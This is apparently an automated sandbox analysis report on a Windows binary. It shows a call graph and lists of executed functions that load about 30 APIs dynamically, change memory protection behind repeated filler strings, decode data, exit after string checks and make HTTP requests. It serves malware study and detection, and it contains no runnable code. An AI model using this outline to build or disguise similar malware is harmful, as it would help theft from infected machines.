e5aab0 lstrcpy 38840->38841 38842 e41663 38841->38842 38843 e55760 38842->38843 38844 e55771 38843->38844 38845 e5ab30 2 API calls 38844->38845 38846 e5577e 38845->38846 38847 e5ab30 2 API calls 38846->38847 38848 e5578b 38847->38848 38849 e5ab30 2 API calls 38848->38849 38850 e55798 38849->38850 38851 e5aa50 lstrcpy 38850->38851 38852 e557a5 38851->38852 38853 e5aa50 lstrcpy 38852->38853 38854 e557b2 38853->38854 38855 e5aa50 lstrcpy 38854->38855 38856 e557bf 38855->38856 38857 e5aa50 lstrcpy 38856->38857 38896 e557cc 38857->38896 38858 e5aa50 lstrcpy 38858->38896 38859 e5ab30 lstrlen lstrcpy 38859->38896 38860 e5abb0 lstrcpy 38860->38896 38861 e55893 StrCmpCA 38861->38896 38862 e558f0 StrCmpCA 38863 e55a2c 38862->38863 38862->38896 38865 e5abb0 lstrcpy 38863->38865 38864 e5aab0 lstrcpy 38864->38896 38866 e55a38 38865->38866 38867 e5ab30 2 API calls 38866->38867 38870 e55a46 38867->38870 38868 e55aa6 StrCmpCA 38871 e55be1 38868->38871 38868->38896 38869 e55440 20 API calls 38869->38896 38872 e5ab30 2 API calls 38870->38872 38873 e5abb0 lstrcpy 38871->38873 38874 e55a55 38872->38874 38876 e55bed 38873->38876 38875 e416b0 lstrcpy 38874->38875 38897 e55a61 38875->38897 38877 e5ab30 2 API calls 38876->38877 38880 e55bfb 38877->38880 38878 e55c5b StrCmpCA 38881 e55c66 Sleep 38878->38881 38882 e55c78 38878->38882 38879 e55510 25 API calls 38879->38896 38883 e5ab30 2 API calls 38880->38883 38881->38896 38885 e5abb0 lstrcpy 38882->38885 38884 e55c0a 38883->38884 38886 e416b0 lstrcpy 38884->38886 38887 e55c84 38885->38887 38886->38897 38888 e5ab30 2 API calls 38887->38888 38889 e55c93 38888->38889 38890 e5ab30 2 API calls 38889->38890 38891 e55ca2 38890->38891 38893 e416b0 lstrcpy 38891->38893 38892 e559da StrCmpCA 38892->38896 38893->38897 38894 e55b8f StrCmpCA 38894->38896 38895 e41590 lstrcpy 38895->38896 38896->38858 38896->38859 38896->38860 38896->38861 38896->38862 38896->38864 38896->38868 38896->38869 38896->38878 38896->38879 38896->38892 38896->38894 38896->38895 38897->37950 38899 e576e3 GetVolumeInformationA 38898->38899 38900 e576dc 38898->38900 38901 e57721 38899->38901 38900->38899 38902 e5778c GetProcessHeap RtlAllocateHeap 38901->38902 38903 e577a9 38902->38903 38904 e577b8 wsprintfA 38902->38904 38905 e5aa50 lstrcpy 38903->38905 38906 e5aa50 lstrcpy 38904->38906 38907 e55ff7 38905->38907 38906->38907 38907->37971 38909 e5aab0 lstrcpy 38908->38909 38910 e448e9 38909->38910 39111 e44800 38910->39111 38912 e448f5 38913 e5aa50 lstrcpy 38912->38913 38914 e44927 38913->38914 38915 e5aa50 lstrcpy 38914->38915 38916 e44934 38915->38916 38917 e5aa50 lstrcpy 38916->38917 38918 e44941 38917->38918 38919 e5aa50 lstrcpy 38918->38919 38920 e4494e 38919->38920 38921 e5aa50 lstrcpy 38920->38921 38922 e4495b InternetOpenA StrCmpCA 38921->38922 38923 e44994 38922->38923 38924 e44f1b InternetCloseHandle 38923->38924 39117 e58cf0 38923->39117 38925 e44f38 38924->38925 39132 e4a210 CryptStringToBinaryA 38925->39132 38927 e449b3 39125 e5ac30 38927->39125 38930 e449c6 38932 e5abb0 lstrcpy 38930->38932 38937 e449cf 38932->38937 38933 e5ab30 2 API calls 38934 e44f55 38933->38934 38936 e5acc0 4 API calls 38934->38936 38935 e44f77 codecvt 38939 e5aab0 lstrcpy 38935->38939 38938 e44f6b 38936->38938 38941 e5acc0 4 API calls 38937->38941 38940 e5abb0 lstrcpy 38938->38940 38952 e44fa7 38939->38952 38940->38935 38942 e449f9 38941->38942 38943 e5abb0 lstrcpy 38942->38943 38944 e44a02 38943->38944 38945 e5acc0 4 API calls 38944->38945 38946 e44a21 38945->38946 38947 e5abb0 lstrcpy 38946->38947 38948 e44a2a 38947->38948 38949 e5ac30 3 API calls 38948->38949 38950 e44a48 38949->38950 38951 e5abb0 lstrcpy 38950->38951 38953 e44a51 38951->38953 38952->37974 38954 e5acc0 4 API calls 38953->38954 38955 e44a70 38954->38955 38956 e5abb0 lstrcpy 38955->38956 38957 e44a79 38956->38957 38958 e5acc0 4 API calls 38957->38958 38959 e44a98 38958->38959 38960 e5abb0 lstrcpy 38959->38960 38961 e44aa1 38960->38961 38962 e5acc0 4 API calls 38961->38962 38963 e44acd 38962->38963 38964 e5ac30 3 API calls 38963->38964 38965 e44ad4 38964->38965 38966 e5abb0 lstrcpy 38965->38966 38967 e44add 38966->38967 38968 e44af3 InternetConnectA 38967->38968 38968->38924 38969 e44b23 HttpOpenRequestA 38968->38969 38971 e44f0e InternetCloseHandle 38969->38971 38972 e44b78 38969->38972 38971->38924 38973 e5acc0 4 API calls 38972->38973 38974 e44b8c 38973->38974 38975 e5abb0 lstrcpy 38974->38975 38976 e44b95 38975->38976 38977 e5ac30 3 API calls 38976->38977 38978 e44bb3 38977->38978 38979 e5abb0 lstrcpy 38978->38979 38980 e44bbc 38979->38980 38981 e5acc0 4 API calls 38980->38981 38982 e44bdb 38981->38982 38983 e5abb0 lstrcpy 38982->38983 38984 e44be4 38983->38984 38985 e5acc0 4 API calls 38984->38985 38986 e44c05 38985->38986 38987 e5abb0 lstrcpy 38986->38987 38988 e44c0e 38987->38988 38989 e5acc0 4 API calls 38988->38989 38990 e44c2e 38989->38990 38991 e5abb0 lstrcpy 38990->38991 38992 e44c37 38991->38992 38993 e5acc0 4 API calls 38992->38993 38994 e44c56 38993->38994 38995 e5abb0 lstrcpy 38994->38995 38996 e44c5f 38995->38996 38997 e5ac30 3 API calls 38996->38997 38998 e44c7d 38997->38998 38999 e5abb0 lstrcpy 38998->38999 39000 e44c86 38999->39000 39001 e5acc0 4 API calls 39000->39001 39002 e44ca5 39001->39002 39003 e5abb0 lstrcpy 39002->39003 39004 e44cae 39003->39004 39005 e5acc0 4 API calls 39004->39005 39006 e44ccd 39005->39006 39007 e5abb0 lstrcpy 39006->39007 39008 e44cd6 39007->39008 39009 e5ac30 3 API calls 39008->39009 39010 e44cf4 39009->39010 39011 e5abb0 lstrcpy 39010->39011 39012 e44cfd 39011->39012 39013 e5acc0 4 API calls 39012->39013 39014 e44d1c 39013->39014 39015 e5abb0 lstrcpy 39014->39015 39016 e44d25 39015->39016 39017 e5acc0 4 API calls 39016->39017 39018 e44d46 39017->39018 39019 e5abb0 lstrcpy 39018->39019 39020 e44d4f 39019->39020 39021 e5acc0 4 API calls 39020->39021 39022 e44d6f 39021->39022 39023 e5abb0 lstrcpy 39022->39023 39024 e44d78 39023->39024 39025 e5acc0 4 API calls 39024->39025 39026 e44d97 39025->39026 39027 e5abb0 lstrcpy 39026->39027 39028 e44da0 39027->39028 39029 e5ac30 3 API calls 39028->39029 39030 e44dbe 39029->39030 39031 e5abb0 lstrcpy 39030->39031 39032 e44dc7 39031->39032 39033 e5aa50 lstrcpy 39032->39033 39034 e44de2 39033->39034 39035 e5ac30 3 API calls 39034->39035 39036 e44e03 39035->39036 39037 e5ac30 3 API calls 39036->39037 39038 e44e0a 39037->39038 39039 e5abb0 lstrcpy 39038->39039 39040 e44e16 39039->39040 39041 e44e37 lstrlen 39040->39041 39042 e44e4a 39041->39042 39043 e44e53 lstrlen 39042->39043 39131 e5ade0 39043->39131 39045 e44e63 HttpSendRequestA 39046 e44e82 InternetReadFile 39045->39046 39047 e44eb7 InternetCloseHandle 39046->39047 39052 e44eae 39046->39052 39050 e5ab10 39047->39050 39049 e5acc0 4 API calls 39049->39052 39050->38971 39051 e5abb0 lstrcpy 39051->39052 39052->39046 39052->39047 39052->39049 39052->39051 39138 e5ade0 39053->39138 39055 e51a14 StrCmpCA 39056 e51a1f ExitProcess 39055->39056 39067 e51a27 39055->39067 39057 e51c12 39057->37976 39058 e51b41 StrCmpCA 39058->39067 39059 e51ba1 StrCmpCA 39059->39067 39060 e51bc0 StrCmpCA 39060->39067 39061 e51b63 StrCmpCA 39061->39067 39062 e51b82 StrCmpCA 39062->39067 39063 e51aad StrCmpCA 39063->39067 39064 e51acf StrCmpCA 39064->39067 39065 e51afd StrCmpCA 39065->39067 39066 e51b1f StrCmpCA 39066->39067 39067->39057 39067->39058 39067->39059 39067->39060 39067->39061 39067->39062 39067->39063 39067->39064 39067->39065 39067->39066 39068 e5ab30 lstrlen lstrcpy 39067->39068 39068->39067 39069->37982 39070->37984 39071->37990 39072->37992 39073->37998 39074->38000 39075->38004 39076->38008 39077->38012 39078->38018 39079->38020 39080->38024 39081->38038 39082->38042 39083->38041 39084->38037 39085->38041 39086->38057 39087->38075 39088->38061 39089->38052 39090->38053 39091->38054 39092->38062 39093->38065 39094->38071 39095->38094 39096->38099 39097->38098 39098->38095 39099->38098 39100->38108 39103 e5aab0 lstrcpy 39102->39103 39104 e416c3 39103->39104 39105 e5aab0 lstrcpy 39104->39105 39106 e416d5 39105->39106 39107 e5aab0 lstrcpy 39106->39107 39108 e416e7 39107->39108 39109 e5aab0 lstrcpy 39108->39109 39110 e415a3 39109->39110 39110->38835 39112 e44816 39111->39112 39113 e44888 lstrlen 39112->39113 39137 e5ade0 39113->39137 39115 e44898 InternetCrackUrlA 39116 e448b7 39115->39116 39116->38912 39118 e5aa50 lstrcpy 39117->39118 39119 e58d04 39118->39119 39120 e5aa50 lstrcpy 39119->39120 39121 e58d12 GetSystemTime 39120->39121 39122 e58d29 39121->39122 39123 e5aab0 lstrcpy 39122->39123 39124 e58d8c 39123->39124 39124->38927 39126 e5ac41 39125->39126 39127 e5ac98 39126->39127 39130 e5ac78 lstrcpy lstrcat 39126->39130 39128 e5aab0 lstrcpy 39127->39128 39129 e5aca4 39128->39129 39129->38930 39130->39127 39131->39045 39133 e4a249 LocalAlloc 39132->39133 39134 e44f3e 39132->39134 39133->39134 39135 e4a264 CryptStringToBinaryA 39133->39135 39134->38933 39134->38935 39135->39134 39136 e4a289 LocalFree 39135->39136 39136->39134 39137->39115 39138->39055

                            Executed Functions

                            Function 00E59BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 e59bb0-e59bc4 call e59aa0 663 e59de3-e59e42 LoadLibraryA * 5 660->663 664 e59bca-e59dde call e59ad0 GetProcAddress * 21 660->664 666 e59e44-e59e58 GetProcAddress 663->666 667 e59e5d-e59e64 663->667 664->663 666->667 669 e59e96-e59e9d 667->669 670 e59e66-e59e91 GetProcAddress * 2 667->670 671 e59e9f-e59eb3 GetProcAddress 669->671 672 e59eb8-e59ebf 669->672 670->669 671->672 673 e59ec1-e59ed4 GetProcAddress 672->673 674 e59ed9-e59ee0 672->674 673->674 675 e59f11-e59f12 674->675 676 e59ee2-e59f0c GetProcAddress * 2 674->676 676->675
                            APIs
                            • GetProcAddress.KERNEL32(75900000,009C1680), ref: 00E59BF1
                            • GetProcAddress.KERNEL32(75900000,009C1698), ref: 00E59C0A
                            • GetProcAddress.KERNEL32(75900000,009C1530), ref: 00E59C22
                            • GetProcAddress.KERNEL32(75900000,009C1560), ref: 00E59C3A
                            • GetProcAddress.KERNEL32(75900000,009C1578), ref: 00E59C53
                            • GetProcAddress.KERNEL32(75900000,009C9888), ref: 00E59C6B
                            • GetProcAddress.KERNEL32(75900000,009B7350), ref: 00E59C83
                            • GetProcAddress.KERNEL32(75900000,009B7310), ref: 00E59C9C
                            • GetProcAddress.KERNEL32(75900000,009C1590), ref: 00E59CB4
                            • GetProcAddress.KERNEL32(75900000,009C16B0), ref: 00E59CCC
                            • GetProcAddress.KERNEL32(75900000,009C15A8), ref: 00E59CE5
                            • GetProcAddress.KERNEL32(75900000,009C16C8), ref: 00E59CFD
                            • GetProcAddress.KERNEL32(75900000,009B73B0), ref: 00E59D15
                            • GetProcAddress.KERNEL32(75900000,009C16E0), ref: 00E59D2E
                            • GetProcAddress.KERNEL32(75900000,009C1410), ref: 00E59D46
                            • GetProcAddress.KERNEL32(75900000,009B7430), ref: 00E59D5E
                            • GetProcAddress.KERNEL32(75900000,009C1428), ref: 00E59D77
                            • GetProcAddress.KERNEL32(75900000,009C17B8), ref: 00E59D8F
                            • GetProcAddress.KERNEL32(75900000,009B70F0), ref: 00E59DA7
                            • GetProcAddress.KERNEL32(75900000,009C17D0), ref: 00E59DC0
                            • GetProcAddress.KERNEL32(75900000,009B7230), ref: 00E59DD8
                            • LoadLibraryA.KERNEL32(009C1740,?,00E56CA0), ref: 00E59DEA
                            • LoadLibraryA.KERNEL32(009C1788,?,00E56CA0), ref: 00E59DFB
                            • LoadLibraryA.KERNEL32(009C1758,?,00E56CA0), ref: 00E59E0D
                            • LoadLibraryA.KERNEL32(009C1728,?,00E56CA0), ref: 00E59E1F
                            • LoadLibraryA.KERNEL32(009C1710,?,00E56CA0), ref: 00E59E30
                            • GetProcAddress.KERNEL32(75070000,009C1770), ref: 00E59E52
                            • GetProcAddress.KERNEL32(75FD0000,009C17A0), ref: 00E59E73
                            • GetProcAddress.KERNEL32(75FD0000,009C9BA0), ref: 00E59E8B
                            • GetProcAddress.KERNEL32(75A50000,009C9BE8), ref: 00E59EAD
                            • GetProcAddress.KERNEL32(74E50000,009B70D0), ref: 00E59ECE
                            • GetProcAddress.KERNEL32(76E80000,009C97D8), ref: 00E59EEF
                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00E59F06
                            Strings
                            • NtQueryInformationProcess, xrefs: 00E59EFA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 3a12095264939aab5f1691ab47f3dad5d593b36589a37e85d16160cb333a638b
                            • Instruction ID: 5c5a3e179e80b901d71a7f1ed3b73c4fdebfdbb4d5a1816d31a12785f1298ef0
                            • Opcode Fuzzy Hash: 3a12095264939aab5f1691ab47f3dad5d593b36589a37e85d16160cb333a638b
                            • Instruction Fuzzy Hash: E1A122B5540210DFC36DDFA8EA88996F7BAA74D3017108A3AF929C3398DB7595C1CF60
                            Function 00E44610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 e44610-e446e5 RtlAllocateHeap 781 e446f0-e446f6 764->781 782 e446fc-e4479a 781->782 783 e4479f-e447f9 VirtualProtect 781->783 782->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E4465F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E447EC
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E447C0
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446FC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4471D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44688
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44707
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4478F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44667
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446B2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44728
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446D3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E447B5
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446BD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44779
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4476E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E447CB
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44693
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446C8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446A7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44763
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44784
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4467D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4479F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44712
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E447AA
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44672
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 3e6f7d061172a1541e81bd29554a72117743052e7db1344122390cb9d550a80b
                            • Instruction ID: 18e4a62b7e2c959eb6ce30f70147126003f0e48a458e03274733a4b7b9bf7cfb
                            • Opcode Fuzzy Hash: 3e6f7d061172a1541e81bd29554a72117743052e7db1344122390cb9d550a80b
                            • Instruction Fuzzy Hash: 194105A17D37846AC634F7A4B8FDEEDB6666F63F42F907044AC2872280FAB2550045B1
                            Function 00E462D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 e462d0-e4635b call e5aab0 call e44800 call e5aa50 InternetOpenA StrCmpCA 1040 e46364-e46368 1033->1040 1041 e4635d 1033->1041 1042 e4636e-e46392 InternetConnectA 1040->1042 1043 e46559-e46575 call e5aab0 call e5ab10 * 2 1040->1043 1041->1040 1044 e4654f-e46553 InternetCloseHandle 1042->1044 1045 e46398-e4639c 1042->1045 1061 e46578-e4657d 1043->1061 1044->1043 1047 e4639e-e463a8 1045->1047 1048 e463aa 1045->1048 1050 e463b4-e463e2 HttpOpenRequestA 1047->1050 1048->1050 1052 e46545-e46549 InternetCloseHandle 1050->1052 1053 e463e8-e463ec 1050->1053 1052->1044 1056 e46415-e46455 HttpSendRequestA HttpQueryInfoA 1053->1056 1057 e463ee-e4640f InternetSetOptionA 1053->1057 1059 e46457-e46477 call e5aa50 call e5ab10 * 2 1056->1059 1060 e4647c-e4649b call e58ad0 1056->1060 1057->1056 1059->1061 1066 e4649d-e464a4 1060->1066 1067 e46519-e46539 call e5aa50 call e5ab10 * 2 1060->1067 1070 e464a6-e464d0 InternetReadFile 1066->1070 1071 e46517-e4653f InternetCloseHandle 1066->1071 1067->1061 1076 e464d2-e464d9 1070->1076 1077 e464db 1070->1077 1071->1052 1076->1077 1080 e464dd-e46515 call e5acc0 call e5abb0 call e5ab10 1076->1080 1077->1071 1080->1070
                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E44800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44889
                              • Part of subcall function 00E44800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44899
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • InternetOpenA.WININET(00E60DFF,00000001,00000000,00000000,00000000), ref: 00E46331
                            • StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E46353
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46385
                            • HttpOpenRequestA.WININET(00000000,GET,?,009CE8D8,00000000,00000000,00400100,00000000), ref: 00E463D5
